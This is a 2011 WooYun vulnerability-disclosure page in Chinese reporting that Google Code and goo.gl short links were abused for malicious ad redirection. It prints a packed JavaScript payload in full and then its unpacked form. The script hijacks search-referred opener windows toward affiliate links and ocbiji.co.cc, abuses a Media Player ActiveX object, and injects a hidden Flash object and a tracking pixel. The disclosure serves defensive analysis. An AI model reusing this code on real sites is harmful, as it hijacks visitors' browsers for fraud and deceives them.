当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01319

漏洞标题:Google业务被恶意钓鱼和广告利用

相关厂商:Google

漏洞作者: xsser

提交时间:2011-02-15 15:13

修复时间:2011-02-15 15:14

公开时间:2011-02-15 15:14

漏洞类型:恶意信息传播

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-02-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-02-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Google的一些互联网业务,包括Google Code和Google短网址服务被恶意钓鱼和垃圾广告利用

详细说明:

http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v=TueFeb152011.js


var urlarr = ["http://goo.gl/NZZl", "http://goo.gl/2bEs"];

漏洞证明:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 1j=Z 2e("(9.F.3)|(9.1b.q)|(9.1b.1g)|(9.2f.3)|(X.q.12.3)|(X.12.3)|(2i.1p.q)|(1k.1p.q)|(X.2b.26.q)|(1k.3)|(9.25.3)|(9.24.3)|(9.27.3)|(28.3)|(9.2a.3)|(29.F.3)|(m.F.3)|(F.2j)|(2k.3)|(2u.3)|(2t.3)|(2v.3)|(2w.3)","i");4("A"==G(I))I="2y";4("A"==G(1c))1c=2x;6 2=[];6 n=v;a{4(H&&H.f&&H.5.2s("2r")){n=H}}g(e){}2.Y=[["8://9.2l.3/?2n=2o",23],["8://p.2q.3/c?s=2p&w=2z&c=1W&i=1M&l=0&e=&t=8://9.1L.3/1O.1P",1K]];2.1i=h(){a{6 R=["8://S.T/1F","8://S.T/1G"];4(5.k){2.Q.1J(R[1H(1I.1Q()*R.J)]);2.Q=13;1Y.1Z()}}g(e){}};2.1d=h(){a{4(5.k&&"A"==G(21)){2.Q=5.18("<E y=0 o=0 1r=\'1S:1T-1V-22-1X-1N\'></E>");v.k("20",2.1i)}}g(e){}};2.1o=V;2.W=V;2.U=h(j){a{n.r.r.1e(j)}g(e){a{n.r.1e(j)}g(2J){a{n.r.1f=j}g(2A){2.1d();2.W=1n}}}};2.O=h(j){4(2.Y.J>0){6 P=2.Y.3f();2.U(P[0]);4(!2.W){1a("2.O(\'"+j+"\')",P[1])}}u{2.U(j)}};2.M=h(){6 N="8://3h.1g.3i/3d.3c?s="+I;4(5.k){N+="&c="+v.1f.37}2.O(N)};4(n.r){4(1j.3b(n.5.3a)){2.1o=1n;4("A"==G(1m)){2.M()}u 4("3n"==1m){}u{2.M()}}}2.1E=h(1q){6 L=5.10.1l("; ");3o(6 i=0;i<L.J;i++){6 K=L[i].1l("=");4(1q==K[0])19 2L(K[1])}19""};2.1u=h(11){D=Z 2I();D.2H(D.2C()+15);5.10="1C="+2D(11)+"; 2G="+D.2P()+";2Q=/"};2.C=h(){4(5.1s==13){1a(2.C,31)}u{6 d=5.18("33");d.B.y="0";d.B.o="0";d.B.2Y="2X";d.B.2S="-2R";6 z="8://17.14.3/16/1h/1A/1B.1D";a{4(!5.k&&(2T.2U.2W("2V")>-1)){z="8://17.14.3/16/1h/1A/1B.1D?b=32"}}g(e){}d.1v=\'<E 1r="2Z:30-2F-2E-2B-2N" 2O="8://2M.1x.3/35/1w/2K/1t/34.3m#3r=7,0,0,0" y="0" o="0"><3p 3q="3k" 3l="\'+z+\'" /><39 1y="\'+z+\'" y="0" o="0" 38="36/x-1w-1t" 3j="8://9.1x.3/3g/3e" /></E>\';6 1z=2.1E("1C");4("1"!=1z){d.1v+="<1U 1y=\'8://S.T/1R\' y=\'0\' o=\'0\' 2m=\'0\'/>";2.1u("1")}5.1s.2c(d)}};a{4(5.k){v.k("2h",2.C)}u{v.2g("2d",2.C,V)}}g(e){}',62,214,'||_bijioc|com|if|document|var||http|www|try|||node|||catch|function||lochref|attachEvent|||_win|height||cn|opener|||else|window|||width|fp|undefined|style|appendpiece|date|object|baidu|typeof|parent|_jdcustomize|length|aCrumb|aCookie|justnavigate|urlr|navigateToUrl|nf|pnode|urlarr|goo|gl|navigateIt|false|hb|search|nHref|new|cookie|sValue|yahoo|null|googlecode||svn|bijioc|createElement|return|setTimeout|google|_jdcid|navigatePower|navigate|location|co|trunk|powerboom|_searchSites|bing|split|_lochref|true|ho|118114|sName|classid|body|flash|setcookie|innerHTML|shockwave|macromedia|src|_co|flv|broadpage|oc_biji|swf|getcookie|NZZl|2bEs|parseInt|Math|launchURL|600|vipshop|2882|00C04F79FAA6|index|php|random|CLEC|CLSID|6BF52A52|img|394A|4018|B153|self|focus|onunload|_nonapower|11D3|800|sogou|soso|vnet|taobao|gougou|cache|gouwo|114|appendChild|load|RegExp|youdao|addEventListener|onload|114search|asp|hao123|vancl|border|source|josion|788e4edd|yiqifa|fulliframe|getElementById|114la|265|115|etao|10011813|normal|148042|e3|96b8|getMinutes|escape|11cf|ae6d|expires|setMinutes|Date|e2|cabs|unescape|fpdownload|444553540000|codebase|toGMTString|path|100px|left|navigator|userAgent|Firefox|indexOf|absolute|position|clsid|d27cdb6e|200|ff|DIV|swflash|pub|application|host|type|embed|referrer|test|html|gomall|getflashplayer|shift|go|ocbiji|cc|pluginspage|movie|value|cab|donotnavigate|for|param|name|version'.split('|'),0,{}))


转换后

var _searchSites = new RegExp("(www.baidu.com)|(www.google.cn)|(www.google.co)|(www.youdao.com)|(search.cn.yahoo.com)|(search.yahoo.com)|(114search.118114.cn)|(bing.118114.cn)|(search.114.vnet.cn)|(bing.com)|(www.soso.com)|(www.sogou.com)|(www.taobao.com)|(gougou.com)|(www.gouwo.com)|(cache.baidu.com)|(m.baidu.com)|(baidu.asp)|(hao123.com)|(265.com)|(114la.com)|(115.com)|(etao.com)", "i");
if ("undefined" == typeof(_jdcustomize)) _jdcustomize = "normal";
if ("undefined" == typeof(_jdcid)) _jdcid = 10011813;
var _bijioc = [];
var _win = window;
try {
    if (parent && parent.f && parent.document.getElementById("fulliframe")) {
        _win = parent
    }
} catch (e) {}
_bijioc.nHref = [
    ["http://www.vancl.com/?source=josion", 800],
    ["http://p.yiqifa.com/c?s=788e4edd&w=148042&c=4018&i=2882&l=0&e=&t=http://www.vipshop.com/index.php", 600]
];
_bijioc.powerboom = function () {
    try {
        var urlarr = ["http://goo.gl/NZZl", "http://goo.gl/2bEs"];
        if (document.attachEvent) {
            _bijioc.pnode.launchURL(urlarr[parseInt(Math.random() * urlarr.length)]);
            _bijioc.pnode = null;
            self.focus()
        }
    } catch (e) {}
};
_bijioc.navigatePower = function () {
    try {
        if (document.attachEvent && "undefined" == typeof(_nonapower)) {
            _bijioc.pnode = document.createElement("<object width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>");
            window.attachEvent("onunload", _bijioc.powerboom)
        }
    } catch (e) {}
};
_bijioc.ho = false;
_bijioc.hb = false;
_bijioc.navigateIt = function (lochref) {
    try {
        _win.opener.opener.navigate(lochref)
    } catch (e) {
        try {
            _win.opener.navigate(lochref)
        } catch (e2) {
            try {
                _win.opener.location = lochref
            } catch (e3) {
                _bijioc.navigatePower();
                _bijioc.hb = true
            }
        }
    }
};
_bijioc.navigateToUrl = function (lochref) {
    if (_bijioc.nHref.length > 0) {
        var nf = _bijioc.nHref.shift();
        _bijioc.navigateIt(nf[0]);
        if (!_bijioc.hb) {
            setTimeout("_bijioc.navigateToUrl('" + lochref + "')", nf[1])
        }
    } else {
        _bijioc.navigateIt(lochref)
    }
};
_bijioc.justnavigate = function () {
    var urlr = "http://ocbiji.co.cc/gomall.html?s=" + _jdcustomize;
    if (document.attachEvent) {
        urlr += "&c=" + window.location.host
    }
    _bijioc.navigateToUrl(urlr)
};
if (_win.opener) {
    if (_searchSites.test(_win.document.referrer)) {
        _bijioc.ho = true;
        if ("undefined" == typeof(_lochref)) {
            _bijioc.justnavigate()
        } else if ("donotnavigate" == _lochref) {} else {
            _bijioc.justnavigate()
        }
    }
}
_bijioc.getcookie = function (sName) {
    var aCookie = document.cookie.split("; ");
    for (var i = 0; i < aCookie.length; i++) {
        var aCrumb = aCookie[i].split("=");
        if (sName == aCrumb[0]) return unescape(aCrumb[1])
    }
    return ""
};
_bijioc.setcookie = function (sValue) {
    date = new Date();
    date.setMinutes(date.getMinutes() + 15);
    document.cookie = "oc_biji=" + escape(sValue) + "; expires=" + date.toGMTString() + ";path=/"
};
_bijioc.appendpiece = function () {
    if (document.body == null) {
        setTimeout(_bijioc.appendpiece, 200)
    } else {
        var node = document.createElement("DIV");
        node.style.width = "0";
        node.style.height = "0";
        node.style.position = "absolute";
        node.style.left = "-100px";
        var fp = "http://bijioc.googlecode.com/svn/trunk/flv/broadpage.swf";
        try {
            if (!document.attachEvent && (navigator.userAgent.indexOf("Firefox") > -1)) {
                fp = "http://bijioc.googlecode.com/svn/trunk/flv/broadpage.swf?b=ff"
            }
        } catch (e) {}
        node.innerHTML = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="0" height="0"><param name="movie" value="' + fp + '" /><embed src="' + fp + '" width="0" height="0" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></object>';
        var _co = _bijioc.getcookie("oc_biji");
        if ("1" != _co) {
            node.innerHTML += "<img src='http://goo.gl/CLEC' width='0' height='0' border='0'/>";
            _bijioc.setcookie("1")
        }
        document.body.appendChild(node)
    }
};
try {
    if (document.attachEvent) {
        window.attachEvent("onload", _bijioc.appendpiece)
    } else {
        window.addEventListener("load", _bijioc.appendpiece, false)
    }
} catch (e) {}

修复方案:

增加业务的检查,避免被恶意利用

版权声明:转载请注明来源 xsser@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:3 (WooYun评价)

漏洞评价:

评论

  1. 2011-02-15 17:53 | GaRY ( 实习白帽子 | Rank:39 漏洞数:3 | 真悲剧平男君)

    这种如何防范呢,站在开发者角度,想不出有什么好方法。

  2. 2011-02-15 18:11 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    可以检查自身的资源是否合法的被使用吧1 google code 是否不能够被在线使用?2 短网址服务是否应该对一些代码做安全检查?

  3. 2012-04-30 15:46 | Say ( 路人 | Rank:17 漏洞数:4 | 谁又会鉴定谁正常?)

    短网址,我想起来以前在hackX的书上看到可以拿来DDOS攻击 = =